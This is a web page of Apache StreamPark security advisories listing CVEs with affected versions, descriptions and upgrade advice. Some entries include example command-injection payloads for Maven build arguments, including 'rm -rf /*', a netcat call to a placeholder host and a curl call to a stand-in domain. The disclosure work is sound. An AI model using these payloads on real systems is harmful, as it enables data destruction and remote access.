Apache StreamPark security advisories

Security information for Apache StreamPark

Reporting

Do you want disclose a potential security issue for Apache StreamPark? You can read more about the projects’ security policy on their security page, and email your report to the Apache Security Team.

Advisories

This section is experimental: it provides advisories since 2023 and may lag behind the official CVE publications. It may also lack details found on the project security page. If you have any feedback on how you would like this data to be provided, you are welcome to reach out on our public mailinglist or privately on security@apache.org

Weak Encryption Algorithm in StreamPark

CVE-2025-54981 [CVE] [CVE json] [OSV json]

Last updated: 2025-12-12T15:10:32.960Z

Affected

  • Apache StreamPark from 2.0.0 before 2.1.7

Description

Weak Encryption Algorithm in StreamPark, The use of an AES cipher in ECB mode and a weak random number generator for encrypting sensitive data, including JWT tokens, may have risked exposing sensitive authentication data

This issue affects Apache StreamPark: from 2.0.0 before 2.1.7.

Users are recommended to upgrade to version 2.1.7, which fixes the issue.

References

Credits

Use hard-coded key vulnerability

CVE-2025-54947 [CVE] [CVE json] [OSV json]

Last updated: 2025-12-12T15:11:36.470Z

Affected

  • Apache StreamPark from 2.0.0 before 2.1.7

Description

In Apache StreamPark versions 2.0.0 through 2.1.7, a security vulnerability involving a hard-coded encryption key exists. This vulnerability occurs because the system uses a fixed, immutable key for encryption instead of dynamically generating or securely configuring the key. Attackers may obtain this key through reverse engineering or code analysis, potentially decrypting sensitive data or forging encrypted information, leading to information disclosure or unauthorized system access.

This issue affects Apache StreamPark: from 2.0.0 before 2.1.7.

Users are recommended to upgrade to version 2.1.7, which fixes the issue.

References

Credits

Uses the user’s password as the secret key

CVE-2025-53960 [CVE] [CVE json] [OSV json]

Last updated: 2025-12-16T10:08:35.119Z

Affected

  • Apache StreamPark from 2.0.0 before 2.1.7

Description

When issuing JSON Web Tokens (JWT), Apache StreamPark directly uses the user's password as the HMAC signing key (e.g., with the HS256 algorithm). An attacker can exploit this vulnerability to perform offline brute-force attacks on the user's password using a captured JWT, or to arbitrarily forge identity tokens for the user if the password is already known, ultimately leading to complete account takeover.

This issue affects Apache StreamPark: from 2.0.0 before 2.1.7.

Users are recommended to upgrade to version 2.1.7, which fixes the issue.

References

Credits

Authenticated users can trigger remote command execution

CVE-2025-30001 [CVE] [CVE json] [OSV json]

Last updated: 2025-10-10T09:52:24.458Z

Affected

  • Apache StreamPark from 2.1.4 before 2.1.6

Description

Incorrect Execution-Assigned Permissions vulnerability in Apache StreamPark.

This issue affects Apache StreamPark: from 2.1.4 before 2.1.6.

Users are recommended to upgrade to version 2.1.6, which fixes the issue.

References

Credits

SQL injection vulnerability

CVE-2024-48988 [CVE] [CVE json] [OSV json]

Last updated: 2025-08-22T16:18:41.486Z

Affected

  • Apache StreamPark from 2.1.4 before 2.1.6

Description

SQL Injection vulnerability in Apache StreamPark.

This issue affects Apache StreamPark: from 2.1.4 before 2.1.6.

Users are recommended to upgrade to version 2.1.6, which fixes the issue.


This vulnerability is present only in the distribution package (SpringBoot platform) and does not involve Maven artifacts.
It can only be exploited after a user has successfully logged into the platform (implying that the attacker would first need to compromise the login authentication).
As a result, the associated risk is considered relatively low.


References

Credits

  • Xingchen Chen, Ze Jin, wh1t3p1g, yhbl, Qixu Liu Institute of Information Engineering, CAS (reporter)

Apache StreamPark IDOR Vulnerability

CVE-2024-34457 [CVE] [CVE json]

Last updated: 2024-09-11T11:03:06.370Z

Affected

  • Apache StreamPark from 1.0.0 before 2.1.4

Description

On versions before 2.1.4, after a regular user successfully logs in, they can manually make a request using the authorization token to view everyone's user flink information, including executeSQL and config.

Mitigation:

all users should upgrade to 2.1.4



References

Credits

  • L0ne1y (reporter)

maven build params could trigger remote command execution

CVE-2024-29737 [CVE] [CVE json] [OSV json]

Last updated: 2024-07-17T08:21:09.036Z

Affected

  • Apache StreamPark (incubating) from 2.0.0 before 2.1.4

Description

In streampark, the project module integrates Maven’s compilation capabilities. The input parameter validation is not strict, allowing attackers to insert commands for remote command execution, The prerequisite for a successful attack is that the user needs to log in to the streampark system and have system-level permissions. Generally, only users of that system have the authorization to log in, and users would not manually input a dangerous operation command. Therefore, the risk level of this vulnerability is very low.


Mitigation:

all users should upgrade to 2.1.4

Background info:

Log in to Streampark using the default username (e.g. test1, test2, test3) and the default password (streampark). Navigate to the Project module, then add a new project. Enter the git repository address of the project and input touch /tmp/success_2.1.2 as the “Build Argument”. Note that there is no verification and interception of the special character “". As a result, you will find that this injection command will be successfully executed after executing the build.<br></span></span><br><div>In the latest version, the special symbol is intercepted.



References

Credits

FreeMarker SSTI RCE Vulnerability

CVE-2024-29178 [CVE] [CVE json] [OSV json]

Last updated: 2024-07-18T11:15:55.181Z

Affected

Description

On versions before 2.1.4, a user could log in and perform a template injection attack resulting in Remote Code Execution on the server, The attacker must successfully log into the system to launch an attack, so this is a moderate-impact vulnerability.


Mitigation:

all users should upgrade to 2.1.4

References

Credits

Information leakage vulnerability

CVE-2024-29120 [CVE] [CVE json] [OSV json]

Last updated: 2024-07-17T14:59:02.804Z

Affected

Description

In Streampark (version < 2.1.4), when a user logged in successfully, the Backend service would return “Authorization” as the front-end authentication credential. User can use this credential to request other users’ information, including the administrator’s username, password, salt value, etc. 

Mitigation:

all users should upgrade to 2.1.4

References

Credits

session not invalidated after logout

CVE-2024-29070 [CVE] [CVE json] [OSV json]

Last updated: 2025-02-06T14:33:02.169Z

Affected

Description

On versions before 2.1.4, session is not invalidated after logout. When the user logged in successfully, the Backend service returns “Authorization” as the front-end authentication credential. “Authorization” can still initiate requests and access data even after logout.

Mitigation:

all users should upgrade to 2.1.4


References

Credits

Unchecked maven build params could trigger remote command execution

CVE-2023-52291 [CVE] [CVE json] [OSV json]

Last updated: 2024-07-17T08:16:10.844Z

Affected

Description

In streampark, the project module integrates Maven’s compilation capabilities. The input parameter validation is not strict, allowing attackers to insert commands for remote command execution, The prerequisite for a successful attack is that the user needs to log in to the streampark system and have system-level permissions. Generally, only users of that system have the authorization to log in, and users would not manually input a dangerous operation command. Therefore, the risk level of this vulnerability is very low.



Background:

In the “Project” module, the maven build args  “<” operator causes command injection. e.g : “< (curl http://xxx.com)” will be executed as a command injection,


Mitigation:

all users should upgrade to 2.1.4,  The “<” operator will blocked。



References

Credits

Unchecked SQL query fields trigger SQL injection vulnerability

CVE-2023-52290 [CVE] [CVE json] [OSV json]

Last updated: 2024-07-16T07:37:36.828Z

Affected

Description


In streampark-console the list pages(e.g: application pages), users can sort page by field. This sort field is sent from the front-end to the back-end, and the SQL query is generated using this field. However, because this sort field isn’t validated, there is a risk of SQL injection vulnerability. The attacker must successfully log into the system to launch an attack, which may cause data leakage. Since no data will be written, so this is a low-impact vulnerability.

Mitigation:

all users should upgrade to 2.1.4, Such parameters will be blocked.



References

Credits

Authenticated system users could trigger remote command execution

CVE-2023-49898 [CVE] [CVE json] [OSV json]

Last updated: 2023-12-15T12:13:22.953Z

Affected

Description

In streampark, there is a project module that integrates Maven's compilation capability. However, there is no check on the compilation parameters of Maven. allowing attackers to insert commands for remote command execution, The prerequisite for a successful attack is that the user needs to log in to the streampark system and have system-level permissions. Generally, only users of that system have the authorization to log in, and users would not manually input a dangerous operation command. Therefore, the risk level of this vulnerability is very low.

Mitigation:

all users should upgrade to 2.1.2


Example:

##You can customize the splicing method according to the compilation situation of the project, mvn compilation results use &&, compilation failure use "||" or "&&":

/usr/share/java/maven-3/conf/settings.xml || rm -rf /*

/usr/share/java/maven-3/conf/settings.xml && nohup nc x.x.x.x 8899 &

References

Authenticated system users could trigger SQL injection vulnerability

CVE-2023-30867 [CVE] [CVE json] [OSV json]

Last updated: 2023-12-15T12:13:59.544Z

Affected

Description

In the Streampark platform, when users log in to the system and use certain features, some pages provide a name-based fuzzy search, such as job names, role names, etc. The sql syntax :select * from table where jobName like '%jobName%'. However, the jobName field may receive illegal parameters, leading to SQL injection. This could potentially result in information leakage.


Mitigation:

Users are recommended to upgrade to version 2.1.2, which fixes the issue.


References

Logic error causing any account reset

CVE-2022-46365 [CVE] [CVE json] [OSV json]

Last updated: 2023-05-01T14:53:47.030Z

Affected

Description

Apache StreamPark 1.0.0 before 2.0.0 When the user successfully logs in, to modify his profile, the username will be passed to the server-layer as a parameter, but not verified whether the user name is the currently logged user and whether the user is legal, This will allow malicious attackers to send any username to modify and reset the account, Users of the affected versions should upgrade to Apache StreamPark 2.0.0 or later.

References

Upload any file to any directory

CVE-2022-45802 [CVE] [CVE json] [OSV json]

Last updated: 2023-06-26T10:23:44.595Z

Affected

Description

Streampark allows any users to upload a jar as application, but there is no mandatory verification of the uploaded file type, causing users to upload some high-risk files, and may upload them to any directory, Users of the affected versions should upgrade to Apache StreamPark 2.0.0 or later



References

LDAP Injection Vulnerability

CVE-2022-45801 [CVE] [CVE json] [OSV json]

Last updated: 2023-05-01T14:50:06.013Z

Affected

Description

Apache StreamPark 1.0.0 to 2.0.0 have a LDAP injection vulnerability.
LDAP Injection is an attack used to exploit web based applications
that construct LDAP statements based on user input. When an
application fails to properly sanitize user input, it's possible to
modify LDAP statements through techniques similar to SQL Injection.
LDAP injection attacks could result in the granting of permissions to
unauthorized queries, and content modification inside the LDAP tree.
This risk may only occur when the user logs in with ldap, and the user
name and password login will not be affected, Users of the affected
versions should upgrade to Apache StreamPark 2.0.0 or later.


References